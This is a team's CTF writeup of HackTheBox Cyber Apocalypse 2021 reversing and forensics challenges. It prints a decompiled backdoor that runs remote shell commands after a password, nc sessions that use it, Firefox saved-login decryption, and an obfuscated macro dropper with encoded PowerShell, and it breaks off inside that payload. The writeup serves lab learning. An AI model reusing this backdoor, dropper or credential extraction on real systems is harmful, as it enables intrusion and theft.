wannaShare | Writeup CTF HackTheBox Cyber Apocalypse 2021 | Reverse Engineering + Web Exploitation + Forensics + Hardware

PHAPHA_JIàN
11:15 01/05/2021

5 days with Hack The Box

Author: Stirring + n3m0

Team: Sp33ch_0f_T1m3 + Anti_Wannaone

Nhóm Wanna.One chia sẻ một số Challenges giải được và việc chia sẻ writeup nhằm mục đích giao lưu học thuật. Mọi đóng-góp ý-kiến bọn mình luôn-luôn tiếp nhận qua mail: wannaone.uit@gmail.com

HTB

1.Authenticator

rev_authenticator.zip

image

if ( ((unsigned __int8)aAVhAG8j89gvPDv[i] ^ 9) != a1[i] )

image

──(kali㉿kali)-[~/Desktop/ReverseHTB]└─$ python3                                                   1 ⚙Python 3.9.2 (default, Feb 28 2021, 17:03:44) [GCC 10.2.1 20210110] on linuxType "help", "copyright", "credits" or "license" for more information.>>> flag = "}a:Vh|}a:g}8j=}89gV<p<}:dV8<Vg9}V<9V<:j|{:">>> xor = 0x9>>> decode_flag = [chr(ord(x)^xor) for x in flag]>>> "".join(decode_flag)'th3_auth3nt1c4t10n_5y5t3m_15_n0t_50_53cur3'>>> zsh: suspended python3┌──(kali㉿kali)-[~/Desktop/ReverseHTB]└─$ ./authenticator                                            148 ⨯ 2 ⚙Authentication System ?                                               Please enter your credentials to continue.                                      Alien ID: 11337                                                   Pin: th3_auth3nt1c4t10n_5y5t3m_15_n0t_50_53cur3                                   Access Granted! Submit pin in the flag format: CHTB{fl4g_h3r3}

So we got the flag: CHTB{th3_auth3nt1c4t10n_5y5t3m_15_n0t_50_53cur3}

2.Passphrase

rev_passphrase.zip

image

image

┌──(kali㉿kali)-[~/Desktop/ReverseHTB/Passphrase]└─$ ltrace ./passphrase                                               4 ⚙setbuf(0x7f95be3186a0, 0)                         = <void>strlen("\nHalt! \342\233\224")                      = 10putchar(10, 0, 0x55d21b000bc8, 8)                     = 10.......strlen("\nYou do not look familiar..")                  = 27putchar(105, 0, 0x55d21b000bd3, 19i)                    = 105usleep(30000)                               = <void>strlen("\nYou do not look familiar..")                  = 27putchar(97, 0, 0x55d21b000bd3, 19a)                    = 97usleep(30000)                               = <void>strlen("\nYou do not look familiar..")                  = 27putchar(114, 0, 0x55d21b000bd3, 19r)                    = 114usleep(30000)                               = <void>strlen("\nYou do not look familiar..")                  = 27putchar(46, 0, 0x55d21b000bd3, 19.)                    = 46usleep(30000)                               = <void>strlen("\nYou do not look familiar..")                  = 27putchar(46, 0, 0x55d21b000bd3, 19.)                    = 46usleep(30000)                               = <void>strlen("\nYou do not look familiar..")                  = 27sleep(1)                                 = 0strlen("\nTell me the secret passphrase: "...)              = 32putchar(10, 0, 0x55d21b000bf0, 16)                    = 10usleep(30000)                               = <void>strlen("\nTell me the secret passphrase: "...)              = 32putchar(84, 0, 0x55d21b000bf0, 16T)                    = 84usleep(30000)                               = <void>strlen("\nTell me the secret passphrase: "...)              = 32putchar(101, 0, 0x55d21b000bf0, 16e)                    = 101usleep(30000)                               = <void>strlen("\nTell me the secret passphrase: "...)              = 32putchar(108, 0, 0x55d21b000bf0, 16l)                    = 108usleep(30000)                               = <void>strlen("\nTell me the secret passphrase: "...)              = 32putchar(108, 0, 0x55d21b000bf0, 16l)                    = 108usleep(30000)                               = <void>strlen("\nTell me the secret passphrase: "...)              = 32putchar(32, 0, 0x55d21b000bf0, 16 )                    = 32usleep(30000)                               = <void>strlen("\nTell me the secret passphrase: "...)              = 32putchar(109, 0, 0x55d21b000bf0, 16m)                    = 109usleep(30000)                               = <void>strlen("\nTell me the secret passphrase: "...)              = 32putchar(101, 0, 0x55d21b000bf0, 16e)                    = 101usleep(30000)                               = <void>strlen("\nTell me the secret passphrase: "...)              = 32putchar(32, 0, 0x55d21b000bf0, 16 )                    = 32usleep(30000)                               = <void>strlen("\nTell me the secret passphrase: "...)              = 32putchar(116, 0, 0x55d21b000bf0, 16t)                    = 116usleep(30000)                               = <void>strlen("\nTell me the secret passphrase: "...)              = 32putchar(104, 0, 0x55d21b000bf0, 16h)                    = 104usleep(30000)                               = <void>strlen("\nTell me the secret passphrase: "...)              = 32putchar(101, 0, 0x55d21b000bf0, 16e)                    = 101usleep(30000)                               = <void>strlen("\nTell me the secret passphrase: "...)              = 32putchar(32, 0, 0x55d21b000bf0, 16 )                    = 32usleep(30000)                               = <void>strlen("\nTell me the secret passphrase: "...)              = 32putchar(115, 0, 0x55d21b000bf0, 16s)                    = 115usleep(30000)                               = <void>......putchar(58, 0, 0x55d21b000bf0, 16:)                    = 58usleep(30000)                               = <void>strlen("\nTell me the secret passphrase: "...)              = 32putchar(32, 0, 0x55d21b000bf0, 16 )                    = 32usleep(30000)                               = <void>strlen("\nTell me the secret passphrase: "...)              = 32sleep(1)                                 = 0fgets(123"123\n", 40, 0x7f95be317980)                    = 0x7ffd03351f80strlen("123\n")                              = 4strcmp("3xtr4t3rR3stR14L5_VS_hum4n5", "123")               = 2printf("\033[31m")                            = 5strlen("\nIntruder alert! \360\237\232\250\n")              = 22                      putchar(10, 0x7ffd0334f8e0, 0x55d21b000c17, 23                                      )              = 10                                             usleep(30000)                               = <void>                    strlen("\nIntruder alert! \360\237\232\250\n")              = 22                      putchar(73, 0, 0x55d21b000c17, 23I)                    = 73                     usleep(30000)                               = <void>                    strlen("\nIntruder alert! \360\237\232\250\n")              = 22                      putchar(110, 0, 0x55d21b000c17, 23n)                    = 110                     usleep(30000)                               = <void>                    strlen("\nIntruder alert! \360\237\232\250\n")              = 22                      putchar(116, 0, 0x55d21b000c17, 23t)                    = 116                     usleep(30000)                               = <void>                    strlen("\nIntruder alert! \360\237\232\250\n")              = 22                      putchar(114, 0, 0x55d21b000c17, 23r)                    = 114                     usleep(30000)                               = <void>                    ....             
┌──(kali㉿kali)-[~/Desktop/ReverseHTB/Passphrase]└─$ ./passphrase                                                   4 ⚙Halt! ⛔You do not look familiar..Tell me the secret passphrase: 3xtr4t3rR3stR14L5_VS_hum4n5✔Sorry for suspecting you, please transfer this important message to the chief: CHTB{3xtr4t3rR3stR14L5_VS_hum4n5} 

Yep, So we got the flag: CHTB{3xtr4t3rR3stR14L5_VS_hum4n5}

3.Backdoor

rev_backdoor.zip

image

┌──(kali㉿kali)-[~/Desktop/ReverseHTB/backdoor]└─$ file bd                                                  100 ⨯ 1 ⚙bd: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=1da3a1d77c7109ce6444919f4a15e7e6c63d02fa, stripped┌──(kali㉿kali)-[~/Desktop/ReverseHTB/backdoor]└─$ chmod +x bd                                                   1 ⚙┌──(kali㉿kali)-[~/Desktop/ReverseHTB/backdoor]└─$ ./bd                     
┌──(kali㉿kali)-[~/Desktop/ReverseHTB/backdoor]└─$ objcopy --dump-section pydata=pydata.dump bd┌──(kali㉿kali)-[~/Desktop/ReverseHTB/backdoor]└─$ ls  bd pydata.dump
┌──(kali㉿kali)-[~/Desktop/ReverseHTB/backdoor]└─$ python pyinstxtractor/pyinstxtractor.py pydata.dump [+] Processing pydata.dump[+] Pyinstaller version: 2.1+[+] Python version: 38[+] Length of package: 6994886 bytes[+] Found 45 files in CArchive[+] Beginning extraction...please standby[+] Possible entry point: pyiboot01_bootstrap.pyc[+] Possible entry point: pyi_rth_multiprocessing.pyc[+] Possible entry point: bd.pyc[!] Warning: This script is running in a different Python version than the one used to build the executable.[!] Please run this script in Python38 to prevent extraction errors during unmarshalling[!] Skipping pyz extraction[+] Successfully extracted pyinstaller archive: pydata.dumpYou can now use a python decompiler on the pyc files within the extracted directory
┌──(kali㉿kali)-[~/Desktop/ReverseHTB/backdoor]└─$ decompyle3 pydata.dump_extracted/bd.pyc  # decompyle3 version 3.3.2# Python bytecode 3.8 (3413)# Decompiled from: Python 3.8.5 (default, Aug 2 2020, 15:09:07) # [GCC 10.2.0]# Embedded file name: bd.pyimport socketfrom hashlib import md5from subprocess import check_outputsock = socket.socket()sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)sock.bind(('0.0.0.0', 4433))sock.listen(5)while True:  while True:    client, addr = sock.accept()    data = client.recv(32)    if len(data) != 32:      client.close()    if data.decode() != md5(b's4v3_th3_w0rld').hexdigest():      client.send(b'Invalid')      client.close()    else:      size = client.recv(1)      command = client.recv(int.from_bytes(size, 'little'))      if not command.startswith(b'command:'):        client.close()      else:        command = command.replace(b'command:', b'')        output = check_output(command, shell=True)        client.send(output)        client.close()
┌──(kali㉿kali)-[~/Desktop]└─$ nc -vvv 0.0.0.0 1234                0.0.0.0: inverse host lookup failed: Unknown host(UNKNOWN) [0.0.0.0] 1234 (?) opens4v3_th3_w0rldcommand:lsbdfixbd.pyflag.txtpydata.dumppydata.dump_extractedpyinstxtractorpython-decompile3 sent 26, rcvd 88
┌──(kali㉿kali)-[~/Desktop]└─$ nc -vvv 0.0.0.0 1234                  0.0.0.0: inverse host lookup failed: Unknown host(UNKNOWN) [0.0.0.0] 1234 (?) opens4v3_th3_w0rldcommand:cat flag.txtCHTB{b4ckd00r5_4r3_d4nG3r0u5}Goodjob!!! sent 36, rcvd 41

So we got the flag: CHTB{b4ckd00r5_4r3_d4nG3r0u5}

/Forensics/

image

1. Oldest trick in the book

Forensics_Oldest_Trick.zip

image

image

image

tshark -r older_trick.pcap -Y "ip.dst == 192.168.1.8" -T fields -e data.data > raw

image

#!usr/bin/env python3flag = []with open('raw', 'r') as file:  text = file.readlines()for payload in text:  flag.append(bytearray.fromhex(payload[16:48]))with open('flag.zip', 'wb') as out_file:  out_file.write(b''.join(flag)) ``` ![image](https://user-images.githubusercontent.com/62060867/115963373-35476880-a549-11eb-90ef-ed738643e739.png)

*So we have a zip file, unzip it

 ┌──(kali㉿kali)-[~/Desktop/older]└─$ unzip flag.zip Archive: flag.zip extracting: fini/addons.json inflating: fini/addonStartup.json.lz4 inflating: fini/broadcast-listeners.json inflating: fini/cert9.db inflating: fini/compatibility.ini inflating: fini/containers.json inflating: fini/content-prefs.sqlite inflating: fini/cookies.sqlite inflating: fini/cookies.sqlite-shm inflating: fini/cookies.sqlite-wal inflating: fini/extension-preferences.json inflating: fini/extensions.json inflating: fini/favicons.sqlite inflating: fini/favicons.sqlite-shm inflating: fini/favicons.sqlite-wal inflating: fini/formhistory.sqlite inflating: fini/handlers.json inflating: fini/key4.db inflating: fini/logins.json inflating: fini/permissions.sqlite inflating: fini/pkcs11.txt inflating: fini/places.sqlite inflating: fini/places.sqlite-shm inflating: fini/places.sqlite-wal inflating: fini/prefs.js inflating: fini/protections.sqlite inflating: fini/search.json.mozlz4 inflating: fini/sessionCheckpoints.json extracting: fini/shield-preference-experiments.json inflating: fini/SiteSecurityServiceState.txt inflating: fini/storage.sqlite inflating: fini/times.json inflating: fini/webappsstore.sqlite  inflating: fini/webappsstore.sqlite-shm inflating: fini/webappsstore.sqlite-wal inflating: fini/xulstore.json
┌──(kali㉿kali)-[~/Desktop/older]└─$ cd fini┌──(kali㉿kali)-[~/Desktop/older/fini]└─$ sudo apt-get install jqReading package lists... DoneBuilding dependency tree... DoneReading state information... Donejq is already the newest version (1.6-2.1).0 upgraded, 0 newly installed, 0 to remove and 394 not upgraded.┌──(kali㉿kali)-[~/Desktop/older/fini]└─$ jq -r -S '.logins[] | .hostname, .encryptedUsername, .encryptedPassword' logins.json | pwdecrypt -d . -p foobarhttps://rabbitmq.makelarid.esDecrypted: "Frank_B"Decrypted: "CHTB{long_time_no_s33_icmp}"

So we have Flag: CHTB{long_time_no_s33_icmp}

2.Key mission

Forensics_Key_Mission.zip

image

image

image

image

image

┌──(kali㉿kali)-[~/Desktop/key_mission]└─$ cat hexoutput.txt020000000000000002000c00000000000200000000000000000000000000000000002c00000000000000000000000000000004000000000000000410000000000000100000000000000000000000000000002c0000000000000016000000000000001608000000000000080000000000000000000000000000001100000000000000000000000000..........
!/usr/bin/pythonfrom __future__ import print_functionimport sys,oslcasekey = {}ucasekey = {}lcasekey[4]="a";      ucasekey[4]="A"lcasekey[5]="b";      ucasekey[5]="B"lcasekey[6]="c";      ucasekey[6]="C"lcasekey[7]="d";      ucasekey[7]="D"lcasekey[8]="e";      ucasekey[8]="E"lcasekey[9]="f";      ucasekey[9]="F"lcasekey[10]="g";     ucasekey[10]="G"lcasekey[11]="h";     ucasekey[11]="H"lcasekey[12]="i";     ucasekey[12]="I"lcasekey[13]="j";     ucasekey[13]="J"lcasekey[14]="k";     ucasekey[14]="K"lcasekey[15]="l";     ucasekey[15]="L"lcasekey[16]="m";     ucasekey[16]="M"lcasekey[17]="n";     ucasekey[17]="N"lcasekey[18]="o";     ucasekey[18]="O"lcasekey[19]="p";     ucasekey[19]="P"lcasekey[20]="q";     ucasekey[20]="Q"lcasekey[21]="r";     ucasekey[21]="R"lcasekey[22]="s";     ucasekey[22]="S"lcasekey[23]="t";     ucasekey[23]="T"lcasekey[24]="u";     ucasekey[24]="U"lcasekey[25]="v";     ucasekey[25]="V"lcasekey[26]="w";     ucasekey[26]="W"lcasekey[27]="x";     ucasekey[27]="X"lcasekey[28]="y";     ucasekey[28]="Y"lcasekey[29]="z";     ucasekey[29]="Z"lcasekey[30]="1";     ucasekey[30]="!"lcasekey[31]="2";     ucasekey[31]="@"lcasekey[32]="3";     ucasekey[32]="#"lcasekey[33]="4";     ucasekey[33]="$"lcasekey[34]="5";     ucasekey[34]="%"lcasekey[35]="6";     ucasekey[35]="^"lcasekey[36]="7";     ucasekey[36]="&"lcasekey[37]="8";     ucasekey[37]="*"lcasekey[38]="9";     ucasekey[38]="("lcasekey[39]="0";     ucasekey[39]=")"lcasekey[40]="Enter";   ucasekey[40]="Enter"lcasekey[41]="esc";    ucasekey[41]="esc"lcasekey[42]="del";    ucasekey[42]="del"lcasekey[43]="tab";    ucasekey[43]="tab"lcasekey[44]="space";   ucasekey[44]="space"lcasekey[45]="-";     ucasekey[45]="_"lcasekey[46]="=";     ucasekey[46]="+"lcasekey[47]="[";     ucasekey[47]="{"lcasekey[48]="]";     ucasekey[48]="}"lcasekey[49]="\\";     ucasekey[49]="|"lcasekey[50]=" ";     ucasekey[50]=" "lcasekey[51]=";";     ucasekey[51]=":"lcasekey[52]="'";     ucasekey[52]="\""lcasekey[53]="`";     ucasekey[53]="~"lcasekey[54]=",";     ucasekey[54]="<"lcasekey[55]=".";     ucasekey[55]=">"lcasekey[56]="/";     ucasekey[56]="?"lcasekey[57]="CapsLock";  ucasekey[57]="CapsLock"lcasekey[79]="RightArrow"; ucasekey[79]="RightArrow"lcasekey[80]="LeftArrow"; ucasekey[80]="LeftArrow"lcasekey[84]="/";     ucasekey[84]="/"lcasekey[85]="*";     ucasekey[85]="*"lcasekey[86]="-";     ucasekey[86]="-"lcasekey[87]="+";     ucasekey[87]="+"lcasekey[88]="Enter";   ucasekey[88]="Enter"lcasekey[89]="1";     ucasekey[89]="1"lcasekey[90]="2";     ucasekey[90]="2"lcasekey[91]="3";     ucasekey[91]="3"lcasekey[92]="4";     ucasekey[92]="4"lcasekey[93]="5";     ucasekey[93]="5"lcasekey[94]="6";     ucasekey[94]="6"lcasekey[95]="7";     ucasekey[95]="7"lcasekey[96]="8";     ucasekey[96]="8"lcasekey[97]="9";     ucasekey[97]="9"lcasekey[98]="0";     ucasekey[98]="0"lcasekey[99]=".";     ucasekey[99]="."if len(sys.argv) == 2:  keycodes = open(sys.argv[1])  for line in keycodes:    bytesArray = bytearray.fromhex(line.strip())    val = int(bytesArray[2])    if val > 3 and val < 100:        if bytesArray[0] == 0x02 or bytesArray[0] == 0x20 :        print(ucasekey[int(bytesArray[2])], end=''), #single line output      else:        print(lcasekey[int(bytesArray[2])], end=''), #single line output else:  print("USAGE: python %s [filename]" % os.path.basename(__file__))
──(kali㉿kali)-[~/Desktop/key_mission]└─$ python script.py hexoutput.txt | grep CHTB  130 ⨯Ispaceaamspacessendinfdeldelgspacessecrretary'sspaceloccationspaceoveerspacethisspacetottallyspaceencryptedspacechannelspacetospacemakespacesurrespacenospaceonespaceelssespacewillspacebespaceablespacetospacespacerreeatdeldeldspaceittspaceexcepptspaceofspaceus.spaceTthisspaceinformmaationspaceissspaceconfiddentialspaceandspacemustspacenotspacebespacesharredspacewithspaceanyonespaceelsse.spaceTthespacespacessecrretary'sspacehiddenspacelooccationspaceisspaceCHTB{a_place=3deldel-3deldel_3deldeldel3_fAr_fAar_awway_ffr0m_eearth}Enter

Oh you here CHTB{a_place=3deldel-3deldel_3deldeldel3_fAr_fAar_awway_ffr0m_eearth}. Tưởng mọi việc đã xong copy và submit ?

 • Wrong flag tèn ten
 • Fake flag, oh no. Sau đó Duytayto đã nhìn ra được quy luật của strings này
  I aam -> I amssendinfdeldelg -> sendingdeldel = backspace
 • Đây mới chính là cái ta cần tìm CHTB{a_plac3_fAr_fAr_away_fr0m_earth}

  So we got the flag: CHTB{a_plac3_fAr_fAr_away_fr0m_earth}

3.Invitation

forensics_invitation.zip

image

┌──(kali㉿kali)-[~/Desktop/Invitation]└─$ unzip invite.docm       Archive: invite.docm inflating: [Content_Types].xml    inflating: _rels/.rels        inflating: word/document.xml     inflating: word/_rels/document.xml.rels  inflating: word/vbaProject.bin   extracting: word/media/image1.png   inflating: word/theme/theme1.xml   inflating: word/_rels/vbaProject.bin.rels  inflating: word/vbaData.xml     inflating: word/settings.xml     inflating: word/styles.xml      inflating: word/webSettings.xml   inflating: word/fontTable.xml    inflating: docProps/core.xml     inflating: docProps/app.xml    ┌──(kali㉿kali)-[~/Desktop/Invitation]└─$ tree.├── [Content_Types].xml├── docProps│  ├── app.xml│  └── core.xml├── invite.docm├── _rels└── word  ├── document.xml  ├── fontTable.xml  ├── media  │  └── image1.png  ├── _rels  │  ├── document.xml.rels  │  └── vbaProject.bin.rels  ├── settings.xml  ├── styles.xml  ├── theme  │  └── theme1.xml  ├── vbaData.xml  ├── vbaProject.bin  └── webSettings.xml6 directories, 15 files
┌──(kali㉿kali)-[~/Desktop/Invitation/word]└─$ olevba vbaProject.bin | more       147 ⨯ 1 ⚙olevba 0.56.1 on Python 3.9.2 - http://decalage.info/python/oletools===============================================================================FILE: vbaProject.binType: OLE-------------------------------------------------------------------------------VBA MACRO ThisDocument.cls in file: vbaProject.bin - OLE stream: 'VBA/ThisDocument'- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Dim bomazpcuwhstlcd As StringDim dbcsmjrdsqm As StringDim gxiwcxqzqi As StringDim uejdkidq As Stringbomazpcuwhstlcd = odsuozldxufm("4c674167414367414941416b414641416377426f4147384162514246414673414e414264414373414a41427741484d4161414276414530415a51426241444d414d414264414373414a774234414363414b514167414367414941426241484d416441427941476b4162674248414630414f67413641476f41627742704147") & odsuozldxufm("34414b41416e") & _odsuozldxufm("4143634149414173414341414b4142624146494152") & odsuozldxufm("514248414755415741426441446f414f67424e41474541564142444145674152514254414367414941416941436b414a774234414363414b77426441444d414d5142624145514153514273414577415a51424941484d414a414172414630414d514262414551416151424d41457741") & _odsuozldxufm("5a51426f41484d414a414167414367414a674238414341414b51413041444d4158514253414545416141426a414673415851424841473441535142534146514163774262414377414a774230414667416167416e414367415a5142444145454154414251414555415567417541436b414a77416b414363414c41416e41486341") & odsuozldxufm("63514270") & _odsuozldxufm("414363414b41426c41454d415151424d4146414152514253414334414b51416e4144734164414259414363414b77416e41476f415a514279414745415877427a41474d416277426b4147774159514274414363414b77416e") & odsuozldxufm("414873415167416e414373414a774255414363414b77416e4145674151774230414667416167416741436341") & _odsuozldxufm("4b77416e4144304149414277414363414b77416e414763415a5142794148634163514270414363414b414169414341414c41416e414334414a774167414377414a774253414363414b77416e41476b41527742494146514164414250414777414a774172414363415a51426d414851414a77416741436b414941423841434141526742") & odsuozldxufm("76") & _odsuozldxufm("414649415251426841454d4153414174414538415167424b4147554159774255414341416577416b414638414c6742574145454154414256414555416651416741436b414b514167414341414b51414b41416f414367416b4148414159514235414777416277426841...

*Hmmm mình sẽ cố gắng giải mã các biểu thức VBA bằng deobfuscate và hiển thị mã nguồn macro sau khi thay thế tất cả các chuỗi bị xáo trộn bằng nội dung được giải mã của chúng

olevba --decode --deobf --reveal vbaProject.bin
┌──(kali㉿kali)-[~/Desktop/Invitation/word]└─$ olevba --decode --deobf --reveal vbaProject.bin......Dim bomazpcuwhstlcd As StringDim dbcsmjrdsqm As StringDim gxiwcxqzqi As StringDim uejdkidq As Stringbomazpcuwhstlcd = "b'LgAgACgAIAAkAFAAcwBoAG8AbQBFAFsANABdACsAJABwAHMAaABvAE0AZQBbADMAMABdACsAJwB4ACcAKQAgACgAIABbAHMAdAByAGkAbgBHAF0AOgA6AGoAbwBpAG'b'4AKAAn'b'ACcAIAAsACAAKABbAFIAR'b'QBHAGUAWABdADoAOgBNAGEAVABDAEgARQBTACgAIAAiACkAJwB4ACcAKwBdADMAMQBbAEQASQBsAEwAZQBIAHMAJAArAF0AMQBbAEQAaQBMAEwA'b'ZQBoAHMAJAAgACgAJgB8ACAAKQA0ADMAXQBSAEEAaABjAFsAXQBHAG4ASQBSAFQAcwBbACwAJwB0AFgAagAnACgAZQBDAEEATABQAEUAUgAuACkAJwAkACcALAAnAHcA'b'cQBp'b'ACcAKABlAEMAQQBMAFAARQBSAC4AKQAnADsAdABYACcAKwAnAGoAZQByAGEAXwBzAGMAbwBkAGwAYQBtACcAKwAn'b'AHsAQgAnACsAJwBUACcAKwAnAEgAQwB0AFgAagAgACcA'b'KwAnAD0AIABwACcAKwAnAGcAZQByAHcAcQBpACcAKAAiACAALAAnAC4AJwAgACwAJwBSACcAKwAnAGkARwBIAFQAdABPAGwAJwArACcAZQBmAHQAJwAgACkAIAB8ACAARgB'" & odsuozldxufm("76b'AFIARQBhAEMASAAtAE8AQgBKAGUAYwBUACAAewAkAF8ALgBWAEEATABVAEUAfQAgACkAKQAgACAAKQAKAAoACgAkAHAAYQB5AGwAbwBhAGQAQgBhAHM'b'AZQA2ADQAIAA9ACAA'b'IgBKAEEAQgBqAEEARwB3AEEAYQBRAEIAbABBAEcANABBAGQAQQBBAGcAQQBEADAAQQBJAEEAQgBPAEEARwBV'b'AEEAZAB3AEEAdABBAEUAOABBAFkAZwBCAHEAQQBHAFUAQQBZ'b'AHcAQgAwAEEAQwBBAEEAVQB3AEIANQBBAEgATQBBAGQAQQBCAGwAQQBHADAAQQBMAGcAQgBPAEEARwBVAEEAZABBAEEAdQBBAEYATQBBAGIA'b'dwBCAGoAQQBHAHMAQQBaAFEA'b'QgAwAEEASABNAEEATABnAEIAVQBBAEUATQBBAFUAQQBCAEQAQQBHAHcAQQBhAFEAQgBsAEEARwA0AEEAZABBAEEAbwBBAEMASQBBAE0AUQBBADUAQQBEAFkAQQ'b'BMAGcAQQB5'b'AEEARABNAEEATQB3AEEAegBBAEMANABBAE4AUQBBADAAQQBDADQAQQBNAGcAQQBpAEEAQwB3AEEATgBBA'b'EEAMABBAEQAUQBBAE4AQQBBAHAAQQBEAHMAQQBKAEEAQgB6AEEA'b'SABRAEEAYwBnAEIAbABBAEcARQBBAGIAUQBBA'b'GcAQQBEADAAQQBJAEEAQQBrAEEARwBNAEEAYgBBAEIAcABBAEcAVQBBAGIAZwBCADAAQQBDADQAQQBSAHcAQgBsAEEASABR'b'AEEAVQB3AEIAMABBAEgASQBBAFoAUQBCAGgAQQBHADAAQQBLAEEAQQBwAEEARABzAEEAVwB3AEIAaQBBAEgAawBBAGQAQQBCAGwAQQBGAHMAQQB'b'YAFEAQgBkAEEAQwBRAEEA'b'WQBnAEIANQBBAEgAUQBBAFoAUQBCAHoAQQBDAEEAQQBQAFEAQQBnAEEARABBAEEATABnAEEAdQBBAEQAWQBBAE4AUQBBADEA'b'QQBEAE0AQQBOAFEAQgA4AEEAQwBVAEEAZQB3'b'AE'b'EAdwBBAEgAMABBAE8AdwBCADMAQQBHAGcAQQBhAFEAQgBzAEEARwBVAEEASwBBAEEAbwBBAEMAUQBBAGEAUQBBAGcAQQBEADAAQQBJAEEAQQBrAEEASABNAEEAZABBAEIA'b'eQBBAEcAVQBB'b'AFkAUQBCAHQAQQBDADQAQQBVAGcAQgBsAEEARwBFAEEAWgBBAEEAbwBBAEMAUQBBAFkAZwBCADUAQQBIAFEAQQBaAFEAQgB6AEEAQwB3AEEASQBBAEEAdwBB'b'AEMAdwBBAEkAQQBBAGsAQQBHAEkAQQBlAFEAQgAwAEEARwBVAEEAYwB3AEEAdQBBAEUAdwBBAFoAUQ'b'BCAHUAQQBHAGMAQQBkAEEAQgBvAEEAQwBrAEEASwBRAEEAZwBBAEMA'b'MABBAGIAZwBCAGwAQQBDAEEAQQBNAEEAQQBwAEEASABz'b'AEEATwB3AEEAawBBAEcAUQBBAFkAUQBCADAAQQBHAEUAQQBJAEEAQQA5AEEAQwBBAEEASwBBAEIATwBBAEcAVQBB'b'AGQAdwBBAHQAQQBFADgAQQBZAGcAQgBxAEEARwBVAEEAWQB3AEIAMABBAEMAQQBBAEwA'b'UQBCAFUAQQBIAGsAQQBjAEEAQgBsAEEARQA0AEEAWQBRAEIAdABBAEcAVQBBAEkA'b'QQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYAUQBBAFoAUQBCADQAQQBIAFEAQQBMAGcAQgBCAEEARgBNAEEAUQB3AE'b'IASgBBAEUAawBBAFIAUQBC'b'AHUAQQBHAE0AQQBiAHcAQgBrAEEARwBrAEEAYgBnAEIAbgBBAEMAawBBAEwA'b'ZwBCAEgAQQBHAFUAQQBkAEEAQgBUAEEASABRAEEAYwBnAEIAcABBAEcANABBAFoAdwBBAG8A'b'QQBDAFEAQQBZAGcAQgA1AEEASABRAEEAW'b'gBRAEIAegBBAEMAdwBBAE0AQQBBAHMAQQBDAEEAQQBKAEEAQgBwAEEAQwBrAEEATwB3AEEAawBBAEgATQBBAFoAUQBCAHUAQQBH'b'AFEAQQBZAGcAQgBoAEEARwBNAEEAYQB3AEEAZwBBAEQAMABBAEkAQQBBAG8AQQBHAGsAQQBaAFEAQ'b'gA0AEEAQwBBAEEASgBBAEIAawBBAEcARQBBAGQAQQBCAGgAQQBDAEEA'")dbcsmjrdsqm = "b'QQBNAGcAQQArAEEAQwBZAEEATQBRAEEAZwBBAEgAdwB'b'BAEkAQQBCAFAAQQBIAFUAQQBkAEEAQQB0AEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBDAEEAQQBL'b'AFEAQQA3AEEAQwBRAEEAYwB3AEIAbABBAEcANABBAFoAQQBCAGkAQQBHAEUAQQBZAHcAQgByAEEARABJ'b'AEEASQBBAEEAZwBBAEQAMABBAEkAQQBBAGsAQQBIAE0AQQBaAFEA'b'QgB1AEEARwBRAEEAWQBnAEIAaABBAEcATQBBAGEAdwBBAGcAQQBDAHMAQQBJAEEAQQBpAEEARgBBAEEAVQB3AEEAZwBBAEMASQBBAEkAQQB'b'BAHIAQQBDAEEAQQBLAEEAQgB3'b'AEEASABjAEEAWgBBAEEAcABBAEMANABBAFUAQQBCAGgAQQBIAFEAQQBhAEEAQQBnAEEAQwBzAEEASQBBAEEAa'b'QBBAEQANABBAEkAQQBBAGkAQQBEAHMAQQBKAEEAQgB6AEEA'b'RwBVAEEAYgBnAEIAawBBA...skipping 1 linegxiwcxqzqi = "b'VAB5AHAAZQAgAC0ATgBhAG0AZQAgAFcAaQBuAG'b'QAbwB3ACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAEMAbwBuAHMAbwBsAGUAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBp'b'AHQAaQBvAG4AIAAnAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0'b'ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAA'b'ZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAKAApADsACgAKAFsA'b'RABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBl'b'AHIAMwAyAC4AZABsAGwAIgApAF0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBs'b'ACAAUwBoAG8AdwBXAGkAbgBkAG8AdwAoAEkA'b'bgB0AFAAdAByACAAaABXAG4AZAAsACAASQBuAHQAMwAyACAAbgBDAG0AZABTAGgAbwB3ACkAOwAKACcAOwAKAFsAQwBvAG4AcwBvAGwA'b'ZQAuAFcAaQBuAGQAbwB3AF0AOgA6'b'AFMAaABvAHcAVwBpAG4AZABvAHcAKABbAEMAbwBuAHMAbwBsAGUALgBXAGkAbgBkAG8AdwBdADoAOgBHAG'b'UAdABDAG8AbgBzAG8AbABlAFcAaQBuAGQAbwB3ACgAKQAsACAA'b'MAApADsACgAKAAoAaQBmACAAKAAkAHAAYQB5AGwAbwBhAGQAQgBhAHMAZQA2ADQAIAAtAG0AYQB0AGMAaAAgACIA'b'aAB0AHQAcAA6AHwAaAB0AHQAcABzADoAIgApACAAewAK'b'ACAAIAAgACAAJABwAGEAeQBsAG8AYQBkAEIAYQBzAGUANgA0ACAAPQAgACgATgBlAHcALQBPAGIA'b'agBlAGMAdAAgACIATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAAiACkA'b'LgBEAG8AdwBuAGwAbwBhAGQAUwB'b'0AHIAaQBuAGcAKAAkAHAAYQB5AGwAbwBhAGQAQgBhAHMAZQA2ADQAKQA7AAoAfQAKAAoAJABpAG4AcwB0AGEAbABsAGUAZAAgAD0AIABH'b'AGUAdAAtAEkAdA'b'BlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAG